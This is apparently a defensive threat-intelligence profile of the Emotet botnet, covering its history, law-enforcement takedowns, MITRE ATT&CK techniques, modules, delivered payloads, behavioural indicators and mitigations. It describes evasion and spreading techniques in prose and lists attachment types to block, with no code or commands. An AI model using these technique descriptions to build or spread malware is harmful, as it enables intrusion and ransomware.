analyst@nohacky:~/threat-actors$
cat/threat-actors/emotet
analyst@nohacky:~/emotet.html
dormant threat profile
type Botnet / MaaS
threat_level Medium (dormant)
status Dormant
origin Believed Ukraine / Eastern Europe
last_updated 2026-03-13
EM
emotet

Emotet

also known as: TA542 Mummy Spider Mealybug GOLD CABIN Heodo

Once designated by Europol as "the world's most dangerous malware," Emotet is a modular banking trojan that evolved into one of the largest and most professional malware-as-a-service (MaaS) and infrastructure-as-a-service (IaaS) botnets in cybercrime history. Active since 2014, Emotet infected over 1.6 million computers globally, generated an estimated $2 billion+ in damages, and served as a primary delivery mechanism for TrickBot, QakBot, IcedID, and Ryuk ransomware. Despite being disrupted twice by international law enforcement, Emotet has been dormant since April 2023, and its mastermind — known only as "Odd" — remains at large.

attributed origin Believed Ukraine / Eastern Europe
organization type Cybercriminal / MaaS Botnet
first observed June 2014
primary motivation Financial / Infrastructure-as-a-Service
primary targets Finance, Government, Healthcare, Education, Manufacturing
peak impact 1.6M+ infected machines; $2B+ in damages
mitre att&ck software S0367
target regions North America, Europe, Asia-Pacific, Global
current status Dormant since April 2023

Overview

Emotet first appeared in June 2014 as a banking trojan that stole financial credentials by monitoring raw network traffic directed at financial institutions. Over the following decade, it evolved into one of the cybercrime ecosystem's central infrastructure providers, offering Malware-as-a-Service (MaaS) and Infrastructure-as-a-Service (IaaS) to other criminal groups. At its peak, Emotet was responsible for an estimated one in five malware infections worldwide, renting access to its vast network of compromised machines to ransomware operators, banking trojan developers, and other threat actors.

The operation is attributed to a cybercriminal group tracked as TA542 (Proofpoint), Mummy Spider (CrowdStrike), Mealybug (ESET), or GOLD CABIN (Secureworks), believed to be based in Ukraine or Eastern Europe. The group's leader, known only by the codename "Odd" (and multiple other aliases including Aron, C700, Cbd748, Ivanov Odd, Mors, Morse, and Veron), has never been identified despite two major law enforcement takedowns and remains actively sought by Europol's Operation Endgame. In May 2024, Operation Endgame published a video calling for public information about Odd's identity, co-conspirators, and current activities.

Emotet's operational rhythm was distinctive: cycles of 2-3 months of aggressive spam campaigns followed by 3-12 months of dormancy used to update capabilities, refresh infrastructure, and evade detection. This pattern of disappearance and resurgence made Emotet one of the most resilient threats in the landscape. The group has been declared dead multiple times, only to return with enhanced capabilities. However, the current dormancy period since April 2023 is the longest without confirmed new activity, and the combination of Microsoft's VBA macro restrictions and sustained law enforcement pressure may have finally disrupted the operation's core business model.

warning

No credible Emotet activity has been observed since April 2023. However, Emotet has resurrected itself before after extended dormancy, and the mastermind "Odd" remains at large. Operation Endgame's public appeal for information (May 2024) and its "Season 2" takedown of related botnet infrastructure (May 2025) suggest law enforcement believes the operators may still be active in other capacities. Organizations should not remove Emotet detection rules and should maintain awareness of potential future resurgence.

Timeline of Disruptions & Resurgences

  • January 2021 — Operation Ladybird: An international coalition of eight countries coordinated by Eurojust and Europol seized Emotet's infrastructure. German BKA pushed an uninstaller module to infected devices. Ukrainian police arrested individuals responsible for the infrastructure. At the time of takedown, over 1.6 million computers were infected globally.
  • November 2021 — First Resurgence: Ten months after the takedown, TrickBot was observed downloading and executing updated Emotet binaries onto previously infected systems. The botnet rebuilt on two new botnets (Epoch 4 and Epoch 5) with upgraded encryption (ECC instead of RSA) and control-flow flattening for code obfuscation.
  • July 2022 — Microsoft Macro Restrictions: Microsoft's default disabling of VBA macros in Office documents downloaded from the internet eliminated Emotet's primary infection vector. The group struggled to adapt, experimenting with LNK files, XLL files, and OneNote attachments with diminishing success.
  • March 2023 — Final Observed Campaign: Three small, distinct malspam campaigns tested different intrusion techniques (VBA macros, OneNote attachments, inflated document files). Each campaign was brief and appeared to reflect dissatisfaction with results.
  • April 2023 — Dormancy Begins: No confirmed Emotet spam activity has been observed since early April 2023. ESET assessed the botnet was "silent and inactive, most probably due to failing to find an effective new attack vector."
  • May 2024 — Operation Endgame (Season 1): International law enforcement disrupted dropper botnet infrastructure supporting IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and TrickBot. Europol issued a public call for information about Emotet's mastermind "Odd."
  • May 2025 — Operation Endgame (Season 2): Continued takedown of related botnet infrastructure. Spamhaus coordinated credential remediation for compromised accounts used in botnet operations.

Botnet Architecture: Epochs

Security researchers tracked Emotet's infrastructure through "epoch" designations. The original botnet operated on three separate botnets (Epoch 1, 2, 3) by September 2019. After the November 2021 resurgence, the rebuilt infrastructure ran on Epoch 4 and Epoch 5. Each epoch maintained independent C2 infrastructure, enabling resilience against partial takedowns. Emotet frequently rotated IP addresses and TCP ports for C2 communications, sometimes using dozens of different malware-hosting URLs per day. The Cryptolaemus research group provided ongoing public tracking of Emotet epoch activity throughout its operational periods.

Target Profile

Emotet was indiscriminate in its targeting, infecting systems belonging to individuals, small businesses, and large organizations alike. Specific sectors were targeted based on financial value and the downstream access they could provide to Emotet's criminal clients.

  • Financial Services: Emotet's original purpose was banking credential theft. Financial institutions remained a primary target throughout its operational history, providing both direct financial returns and high-value credentials for further exploitation.
  • Government (State & Local): CISA issued a dedicated alert in 2020 warning of a significant increase in Emotet targeting of state and local governments. The agency's intrusion detection system recorded approximately 16,000 Emotet-related alerts since July 2020. CISA estimated remediation costs of $1 million per incident for government agencies.
  • Healthcare: A significant target during the COVID-19 pandemic period. Emotet delivered ransomware payloads (including Ryuk) to healthcare organizations, causing severe operational disruptions. HHS HC3 issued multiple threat advisories specifically addressing Emotet's impact on the health sector.
  • Education: Universities and school systems were frequently targeted, with Emotet using their compromised infrastructure to distribute further spam. The education sector's typically less mature security posture made it a productive infection environment.
  • Manufacturing & Technology: Emotet infections in manufacturing and technology organizations provided high-value access for ransomware operators like Ryuk and Conti, where operational downtime translates to significant financial pressure.

Geographically, Emotet campaigns were truly global, hitting targets across North America, Europe, Asia-Pacific, and beyond. Spam campaigns used multiple languages including English, French, Russian, Italian, Spanish, Chinese, Slovenian, Hungarian, Polish, and Norwegian to maximize reach. At peak volume, a single infected host could send 12+ emails per minute, meaning hundreds of active bots generated hundreds of thousands of malicious emails daily.

Tactics, Techniques & Procedures

Emotet's TTPs evolved significantly over its decade of operation, adapting to defensive improvements and operational setbacks. The following reflects the group's capabilities across its full operational history.

mitre idtechniquedescription
T1566.001 Spearphishing Attachment Primary infection vector. Delivered malicious Word, Excel, OneNote, and ZIP attachments via massive spam campaigns. Used thread hijacking (replying to stolen legitimate email chains) to increase credibility. At peak, generated hundreds of thousands of emails per day.
T1566.002 Spearphishing Link Emails containing links to malicious files hosted on compromised or attacker-controlled infrastructure. Used OneDrive URLs hosting ZIP files containing XLL files in later campaigns. URLs rotated frequently, sometimes dozens per day.
T1059.005 Visual Basic VBA macros in Office documents were Emotet's most effective infection vector from 2014-2022. Microsoft's July 2022 default disabling of VBA macros in internet-sourced documents effectively killed this vector. Later campaigns used social engineering to trick victims into copying files to whitelisted "Templates" folders to bypass the restriction.
T1027 Obfuscated Files or Information Hashbusting generates unique file hashes for each infection. Control-flow flattening obfuscates code execution paths. Inflated file sizes (500MB+) used to evade antivirus scanning limitations. Emotet DLLs padded beyond scanner file size limits.
T1218 System Binary Proxy Execution Uses legitimate Windows utilities (mshta.exe, regsvr32.exe, rundll32.exe) to execute malicious payloads, exploiting trust in signed Microsoft binaries (living-off-the-land).
T1547.001 Registry Run Keys / Startup Folder Creates registry run keys and Windows services for persistence across system reboots. Maintains multiple persistence mechanisms to survive partial remediation.
T1110 Brute Force Brute-forces passwords using built-in password lists to spread laterally across networks. Writes to SMB shared drives on compromised networks to infect additional machines without requiring user interaction.
T1114.001 Local Email Collection Harvests email contacts and message content from infected machines' email clients. Stolen emails are used to fuel thread-hijacking spam campaigns, making Emotet phishing appear as replies to legitimate conversations. This technique produced one of the largest-scale spearphishing operations ever observed.
T1104 Multi-Stage Channels Modular architecture uses initial Emotet infection as a staging platform for secondary payloads. Delivered TrickBot, QakBot, IcedID, Cobalt Strike beacons, and ransomware (Ryuk, Conti, Quantum, ALPHV/BlackCat) to infected machines on behalf of criminal clients.
T1573 Encrypted Channel C2 communications encrypted using elliptic curve cryptography (ECC, post-2021 resurgence) replacing earlier RSA encryption. HTTPS with self-signed certificates. Google's ProtoBuf protocol used for C2 message formatting.

Known Campaigns

Emotet's campaigns are defined by their enormous scale and cyclical pattern of aggressive spamming followed by extended dormancy.

Banking Trojan Operations 2014 – 2017

Initial operations as a banking trojan targeting financial institutions. Evolved through multiple versions (V1-V4), adding capabilities including worm-like propagation, third-party malware delivery, and modular architecture. By 2017, began delivering malware payloads for other criminal groups, transitioning from direct theft to infrastructure-as-a-service.

TrickBot & Ryuk Delivery Partnership 2018 – 2020

Emotet became a primary delivery mechanism for TrickBot banking trojan and, subsequently, Ryuk ransomware. This "triple threat" infection chain (Emotet → TrickBot → Ryuk) was responsible for some of the most damaging ransomware attacks against healthcare, education, and government organizations during this period. At peak, Emotet controlled infrastructure across three botnets (Epoch 1, 2, 3) and infected over 1.6 million computers.

U.S. State & Local Government Surge JUL – DEC 2020

CISA issued an alert warning of a significant increase in Emotet targeting of state and local governments after resurfacing from a five-month dormancy. CISA's intrusion detection system recorded approximately 16,000 Emotet alerts. The 2018 U.S. DHS alert had previously estimated remediation costs of $1 million per incident. Emotet became one of the most prevalent ongoing threats during this period.

Operation Ladybird Takedown JAN 2021

International law enforcement coalition from eight countries (Netherlands, Germany, U.S., U.K., France, Lithuania, Canada, Ukraine) seized Emotet's infrastructure. German BKA pushed an uninstaller module to infected devices, scheduled for mass removal on April 25, 2021. Ukrainian police arrested individuals responsible for infrastructure maintenance. At the time, Emotet had infected over 1.6 million computers globally and cost U.S. organizations alone over $45,000 in per-computer remediation.

Epoch 4/5 Resurgence NOV 2021 – JUL 2022

Emotet resurrected ten months after takedown, rebuilt via TrickBot infrastructure. New botnets (Epoch 4, Epoch 5) featured upgraded ECC encryption, control-flow flattening obfuscation, and HTTPS with self-signed certificates. Reached over 50% of pre-takedown volume within weeks. Kaspersky recorded a 200% activity increase in March 2022 alone, with 30,000 malicious emails in a single month. Check Point ranked Emotet as the most prevalent malware globally during this period. Microsoft's July 2022 VBA macro restrictions caused a sharp decline.

Final Spam Campaigns NOV 2022 – MAR 2023

Brief, experimental campaigns testing alternative infection vectors after macro restrictions: XLS documents with macros (November 2022, two weeks only), VBA macro documents with social engineering to bypass Protected View (March 2023), OneNote attachments, and inflated document files exceeding 500MB. Each campaign was smaller than the last, suggesting the operators struggled to find an effective replacement for their VBA macro attack vector. No confirmed activity since early April 2023.

Tools & Malware

Emotet's modular architecture supported a wide range of capabilities through loadable modules and delivered third-party payloads.

  • Emotet Core (Loader/Downloader): The primary infection payload. Modular DLL-based architecture supporting hot-swappable modules. Uses hashbusting to generate unique file hashes per infection. Registered as a Windows service for persistence. Post-2021 versions use ECC encryption, control-flow flattening, and Google ProtoBuf for C2 communications.
  • Spammer Module: Transforms infected machines into spam bots, sending 12+ emails per minute from compromised accounts. Uses stolen email content and contact lists for thread-hijacking campaigns. Considered by Mealybug to be a "precious" module deployed only on machines deemed safe.
  • Email Harvester Module: Extracts email contacts, message bodies, and credentials from infected machines' email clients. Fuels the thread-hijacking spam pipeline that made Emotet's phishing unusually effective.
  • Credential Stealer Module: Harvests usernames and passwords from web browsers, email clients, and other applications. Stolen credentials sold to other criminal groups or used for lateral movement.
  • Network Spreader / SMB Module: Propagates across internal networks by writing to SMB file shares and brute-forcing passwords using built-in password lists. Enables worm-like behavior within compromised environments.
  • StealBit-style Exfiltration: Captures network traffic and exfiltrates system information including computer name, locale, OS version, and running processes to C2 infrastructure.

Third-Party Payloads Delivered via Emotet

  • TrickBot: Banking trojan that became Emotet's most significant payload partner. TrickBot later assisted Emotet's November 2021 resurgence by distributing updated Emotet binaries.
  • QakBot (Qbot): Banking trojan and backdoor delivered to Emotet-infected machines. Also uses thread-hijacking techniques similar to Emotet's own campaigns.
  • IcedID: Banking trojan/loader delivered as a secondary payload in post-resurgence campaigns (2022).
  • Cobalt Strike: Commercial adversary simulation tool delivered for post-exploitation and lateral movement, enabling more hands-on ransomware deployment.
  • Ryuk / Conti / Quantum / ALPHV (BlackCat): Ransomware families delivered to Emotet-infected networks. The Emotet → TrickBot → Ryuk chain was particularly devastating to healthcare and government organizations.
  • Bumblebee: Malware loader observed being delivered via Emotet in late 2022 campaigns, serving as an alternative initial access mechanism for ransomware operators.

Indicators of Compromise

Emotet generates enormous volumes of IOCs due to hashbusting, daily URL rotation, and frequent C2 infrastructure changes. Static IOC lists have extremely limited shelf life.

warning

Emotet's hashbusting technique produces unique file hashes for every infection. C2 IP addresses and malware-hosting URLs change daily or more frequently. Static IOC lists become stale within hours. For real-time Emotet tracking, use the abuse.ch Emotet trackers (Feodo Tracker for C2 servers, URLhaus for malware URLs, MalwareBazaar for samples) and the Cryptolaemus community research group's public feeds.

behavioral indicators (detection-focused)
delivery Malicious Office documents (Word, Excel, OneNote) or password-protected ZIP archives delivered via reply-chain hijacked emails
execution VBA macro execution, followed by regsvr32.exe or rundll32.exe launching DLL payloads from %LOCALAPPDATA% directories
evasion Inflated file sizes (500MB+) exceeding AV scanner limits; hashbusting produces unique hashes per infection
persistence Windows service registration; registry run keys; multiple simultaneous persistence mechanisms
lateral SMB share writing and brute-force password attacks using built-in password lists for worm-like network propagation
c2 ECC-encrypted HTTPS with self-signed certificates; Google ProtoBuf message formatting; frequent IP/port rotation
resource abuse.ch Feodo Tracker (C2), URLhaus (URLs), MalwareBazaar (samples); Cryptolaemus community tracking

Mitigation & Defense

Recommended defensive measures based on CISA Alert AA20-280A, Europol advisories, and threat intelligence community guidance. While Emotet is currently dormant, these mitigations protect against its historical TTPs and similar threats.

  • Enforce macro restrictions in Microsoft Office: Microsoft's default disabling of VBA macros in internet-sourced documents was the single most effective defense against Emotet. Ensure this policy is enforced organization-wide via Group Policy. Block XLL file types and restrict OneNote embedded file execution where possible.
  • Block common malware-associated file types at the email gateway: Filter .dll, .exe, .scr, .hta, .vbs, .js, .lnk, and .xll attachments. Block or quarantine password-protected ZIP archives that cannot be scanned. Implement size-based filtering to catch inflated documents (500MB+) designed to evade AV scanners.
  • Implement email authentication (DMARC, DKIM, SPF): Emotet's thread-hijacking campaigns spoof legitimate senders using harvested email content. Strict email authentication helps identify spoofed messages. Configure DMARC with reject policies and monitor for failures.
  • Deploy robust endpoint detection and response (EDR): Monitor for Emotet's living-off-the-land techniques: regsvr32.exe and rundll32.exe loading DLLs from unusual directories, mshta.exe executing remote HTA files, and PowerShell-based download cradles. Behavioral detection is essential given hashbusting makes signature-based detection unreliable.
  • Restrict lateral movement: Emotet spreads via SMB shares and brute-forced passwords. Segment networks to limit SMB access between workstations, enforce strong password policies, implement account lockout mechanisms, and restrict administrative shares.
  • Maintain patched and current systems: While Emotet primarily relied on social engineering for initial access, its downstream payloads (TrickBot, Ryuk, Conti) often exploit unpatched vulnerabilities for lateral movement and privilege escalation.
  • Subscribe to real-time Emotet tracking feeds: Static IOC lists are ineffective against Emotet's daily rotation of indicators. Use the abuse.ch Feodo Tracker, URLhaus, and MalwareBazaar for real-time C2, URL, and sample tracking. Follow the Cryptolaemus community research group for public epoch tracking and campaign analysis.
  • Treat Emotet infections as precursors to ransomware: An Emotet infection, or even an infection attempt, is one of the strongest early indicators of a future ransomware attack. Prioritize rapid detection and containment of any Emotet-related activity to prevent downstream payload delivery.
note

Emotet's greatest legacy may be the ecosystem it helped build. By providing reliable, scalable initial access to criminal clients, Emotet enabled the ransomware-as-a-service economy that continues to thrive today. Even in dormancy, the TTPs Emotet pioneered — thread hijacking, hashbusting, modular payload delivery, and infrastructure-as-a-service — have been adopted by successor operations including QakBot, Bumblebee, and PikaBot. Defending against these successors requires the same mitigations that were effective against Emotet itself. Emotet's mastermind "Odd" remains unidentified and potentially active in other operations; a resurgence cannot be ruled out.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile